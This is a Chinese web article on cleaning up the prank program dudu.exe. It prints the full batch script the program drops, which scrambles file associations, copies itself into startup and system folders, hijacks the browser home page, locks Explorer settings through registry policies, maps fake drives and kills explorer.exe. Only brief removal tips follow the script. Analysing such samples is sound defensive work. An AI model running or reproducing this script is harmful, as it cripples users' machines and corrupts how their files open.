首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
实用技巧
病毒查杀
正文
恶作剧程序dudu.exe清除方法
所属分类:
实用技巧
/
病毒查杀
阅读数: 793
收藏 0
赞 0
分享
恶作剧程序dudu.exe清除解决方案
dudu.exe运行后,当前用户临时文件夹中释放一个bt0577.bat批处理文件。这是个恶作剧程序。想办法阻止此.bat运行,用记事本打开该文件,可以看到下列内容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
HideClock /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————
如果bt0577.bat运行了,资源管理器进程被结束,用户只有一个空桌面可看了;文件关联被改得乱七八糟;三键调出任务管理器,重新启动资源管理器,用资源管理器查看,可见硬盘分区增加n个其实并未增加(可用PQ核实)。
此程序不能穿透影子。如果在影子中运行从恶作剧程序,重启一下就OK了。
更多精彩内容
其他人还在看
emapicn.exe,winpac.exe恶意插件疯弹广告解决方法
emapicn.exe,winpac.exe恶意插件疯弹广告解决方法
评论 0
收藏 0
赞 0
分享
test.exe,vista.exe,a.jpg,Flower.dll病毒分析解决
test.exe,vista.exe,a.jpg,Flower.dll病毒分析解决
评论 0
收藏 0
赞 0
分享
上周方法病毒来源竟然为ad.pchome.net原来被挂马
公司的服务器遭受arp攻击,所挂的代码总,竟然是ad.pchome.net的网站
评论 0
收藏 0
赞 0
分享
Worm.Win32.AutoRun.bqn病毒分析解决
Worm.Win32.AutoRun.bqn病毒分析解决
评论 0
收藏 0
赞 0
分享
恶作剧程序dudu.exe清除方法
恶作剧程序dudu.exe清除方法
评论 0
收藏 0
赞 0
分享
1sass.exe,winnet.sys,2pwsdor.sys,k87wovjoq.sys病毒清除
1sass.exe,winnet.sys,2pwsdor.sys,k87wovjoq.sys病毒清除
评论 0
收藏 0
赞 0
分享
提权思路之MSSQL差异备份取系统权限
看了下面的文章,不是让大家搞破坏,大家可以加强自己服务器的安全性。
评论 0
收藏 0
赞 0
分享
U.EXE病毒删除方法
U.EXE病毒删除方法
评论 0
收藏 0
赞 0
分享
欧洲顶级杀病毒软件熊猫卫士 2008 12.01 Final最终版提供下载
欧洲顶级杀病毒软件熊猫卫士 2008 12.01 Final最终版提供下载
评论 0
收藏 0
赞 0
分享
u盘病毒清除 Discovery.exe查杀方法
u盘病毒清除 Discovery.exe查杀方法
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
漂洋过海坑死你 海淘代购名为国际大牌实为国产的山寨货
网赚之谈:做什么网站才能让我们草根站长有个出路
贴吧引流变现,高调创收!
短视频如何赚钱?短视频自媒体实操经验分享(真实)
淘宝评级规则详解
在校大学生利用网络可以做什么?在校大学生利用网络赚钱方式介绍
站长故事
更多
喜马拉雅创始人自述:网络电台一年半获取7000万用户
被低估的公司(一):写在阿里IPO之后
站长故事 一位“苦逼站长”的心酸 SEO真的如此简单吗?
站长从菜鸟到资深必经过程
草根站长告诉你通过互联网赚钱到底难不难(真实经历)
暴走漫画运营经理 这就是高级运营与初级运营的区别